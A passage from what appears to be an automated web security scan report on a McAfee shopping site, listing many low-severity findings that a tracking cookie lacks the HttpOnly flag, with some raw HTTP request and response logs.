Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/input-devices/joysticks-gamepads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:50 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.143. http://secureshopping.mcafee.com/browse/computers/input-devices/keyboards/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/input-devices/keyboards/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:50 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.144. http://secureshopping.mcafee.com/browse/computers/input-devices/mice/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/input-devices/mice/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:51 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.145. http://secureshopping.mcafee.com/browse/computers/monitors/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/monitors/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:52 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.146. http://secureshopping.mcafee.com/browse/computers/network-communications/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/network-communications/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:54 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.147. http://secureshopping.mcafee.com/browse/computers/network-communications/adapters-interfaces/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/network-communications/adapters-interfaces/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:55 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.148. http://secureshopping.mcafee.com/browse/computers/network-communications/bridges,-routers,-gateways/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/network-communications/bridges,-routers,-gateways/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.149. http://secureshopping.mcafee.com/browse/computers/network-communications/modems/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/network-communications/modems/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:58 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.150. http://secureshopping.mcafee.com/browse/computers/network-communications/network-hubs-switches/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/network-communications/network-hubs-switches/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:49:58 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.151. http://secureshopping.mcafee.com/browse/computers/servers/terminals-thin-clients/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/computers/servers/terminals-thin-clients/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:48:11 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.152. http://secureshopping.mcafee.com/browse/electronics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/electronics/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:48:00 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.153. http://secureshopping.mcafee.com/browse/electronics/digital-cameras/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/electronics/digital-cameras/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:48:28 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.154. http://secureshopping.mcafee.com/browse/food-wine/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/food-wine/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:49 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.155. http://secureshopping.mcafee.com/browse/health-beauty/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/health-beauty/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.156. http://secureshopping.mcafee.com/browse/home-garden/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/home-garden/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.157. http://secureshopping.mcafee.com/browse/jewelry-watches/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/jewelry-watches/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:49 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.158. http://secureshopping.mcafee.com/browse/magazines/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/magazines/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:49 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.159. http://secureshopping.mcafee.com/browse/movies/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/movies/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:52 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.160. http://secureshopping.mcafee.com/browse/music/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/music/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:53 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.161. http://secureshopping.mcafee.com/browse/office-products/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/office-products/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:54 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.162. http://secureshopping.mcafee.com/browse/software/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/software/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:52:57 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.163. http://secureshopping.mcafee.com/browse/sports-outdoors/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/sports-outdoors/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:02 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.164. http://secureshopping.mcafee.com/browse/toys/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/toys/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.165. http://secureshopping.mcafee.com/browse/toys/cars,-trains-planes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/toys/cars,-trains-planes/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 18:32:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.166. http://secureshopping.mcafee.com/browse/video-games/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/video-games/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:06 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.167. http://secureshopping.mcafee.com/canon-eos-1d-3822b002-mark-iv-digital-slr-camera-body-only-16-1-megapixels--pid-214785577 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/canon-eos-1d-3822b002-mark-iv-digital-slr-camera-body-only-16-1-megapixels--pid-214785577

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Mon, 26-Dec-2011 04:08:36 GMT
user=id=1293248423528-1-dMZf&ph=214785577; path=/; expires=Mon, 26-Dec-2011 04:08:36 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

4.168. http://secureshopping.mcafee.com/css/home.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/css/home.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:25 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/home.css HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:25 GMT
ETag: "5D7pOrfoUt+"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:25 GMT
Content-Type: text/css; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:25 GMT
Content-Length: 887

div.card1 {
width: 265px;
height: 128px;
}

div.card2 {
font-size: 11px;
padding-left: 70px;
padding-top: 60px;;
padding-right: 10px;
}

td.catrow {
padding-left: 10p
...[SNIP]...

4.169. http://secureshopping.mcafee.com/css/product.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/css/product.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf&ph=214785577; path=/; expires=Mon, 26-Dec-2011 04:08:37 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/product.css HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/canon-eos-1d-3822b002-mark-iv-digital-slr-camera-body-only-16-1-megapixels--pid-214785577
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; SiteID=1; langid=1; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; __utmz=192341800.1293334644.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; __utma=192341800.102881162.1293269981.1293334984.1293336482.6; __utmc=192341800; __utmb=192341800.3.10.1293336482; user=id=1293248423528-1-dMZf&ph=214785577

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Mon, 27 Dec 2010 04:08:37 GMT
ETag: "5D7pOrfoUqm"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf&ph=214785577; path=/; expires=Mon, 26-Dec-2011 04:08:37 GMT
Content-Type: text/css; charset=utf-8
Date: Sun, 26 Dec 2010 04:08:37 GMT
Content-Length: 671

#pctable th {
background: #ddece9;
color: #2a5a6e;
font-size: 14px;
font-weight: bold;
}

.row0 {
border-bottom: solid 1px #b2cfcb;
background: #ffffff;
}

.row1 {
bo
...[SNIP]...

4.170. http://secureshopping.mcafee.com/css/public.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/css/public.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:24 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/public.css?1 HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:24 GMT
ETag: "5D7pOrfoVMF"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:24 GMT
Content-Type: text/css; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:24 GMT
Content-Length: 2814

body, td, div, p, th {
font: 12px arial;
color: #333;
text-align: left;
}

#wrapper {
width: 960px;
margin: auto;
text-align: left;
}

a {
color: #336699;
}

a:vis
...[SNIP]...

4.171. http://secureshopping.mcafee.com/css/search.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/css/search.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:20 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/search.css HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/browse/baby/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=192341800.102881162.1293269981.1293269981.1293269981.1; __utmc=192341800; __utmb=192341800.7.10.1293269981; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:42:20 GMT
ETag: "5D7pOrfoU9W"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:20 GMT
Content-Type: text/css; charset=utf-8
Date: Sat, 25 Dec 2010 03:42:20 GMT
Content-Length: 1871

.usrrevbox {
cursor: pointer;
}

.tnumresults h1 {
display: inline;
font-size: 12px;
font-weight: normal;
}

.tnumresults {
font-size: 12px;
font-weight: normal;
marg
...[SNIP]...

4.172. http://secureshopping.mcafee.com/images/addto_google.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/addto_google.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Mon, 26-Dec-2011 04:08:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/addto_google.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/hot-products
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; SiteID=1; langid=1; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; __utmz=192341800.1293334644.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; user=id=1293248423528-1-dMZf; __utma=192341800.102881162.1293269981.1293334984.1293336482.6; __utmc=192341800; __utmb=192341800.2.10.1293336482

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Mon, 27 Dec 2010 04:08:31 GMT
ETag: "5D7pOrfoU7/"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Mon, 26-Dec-2011 04:08:31 GMT
Content-Type: image/gif; charset=utf-8
Date: Sun, 26 Dec 2010 04:08:31 GMT
Content-Length: 1784

GIF89ah.........3...............0I...&e..o....-q....7}.0u..H\l............[........d.......%a..2P...Q.....>..#^..So.......*......R..R{.
j....Mr..4[U..q..d.....J.....z..T..h..8.@...f}}...Fa..E.....RW
...[SNIP]...

4.173. http://secureshopping.mcafee.com/images/addto_live.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/addto_live.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Mon, 26-Dec-2011 04:08:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/addto_live.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/hot-products
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; SiteID=1; langid=1; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; __utmz=192341800.1293334644.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; user=id=1293248423528-1-dMZf; __utma=192341800.102881162.1293269981.1293334984.1293336482.6; __utmc=192341800; __utmb=192341800.2.10.1293336482

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Mon, 27 Dec 2010 04:08:31 GMT
ETag: "5D7pOrfoU3S"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Mon, 26-Dec-2011 04:08:31 GMT
Content-Type: image/gif; charset=utf-8
Date: Sun, 26 Dec 2010 04:08:31 GMT
Content-Length: 1483

GIF89aj........................[[[===Q.I.........yyyLLL...T.L..}......~.w\.Tk.d......X.Pjjj...w.pr.jf.^w.qa.Y`.Y......q.j............................d*|.C.c+..m..V/...G'
....w........*..Bb...ZH..3.y..
...[SNIP]...

4.174. http://secureshopping.mcafee.com/images/addto_myaol.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/addto_myaol.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Mon, 26-Dec-2011 04:08:31 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/addto_myaol.gif HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/hot-products
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
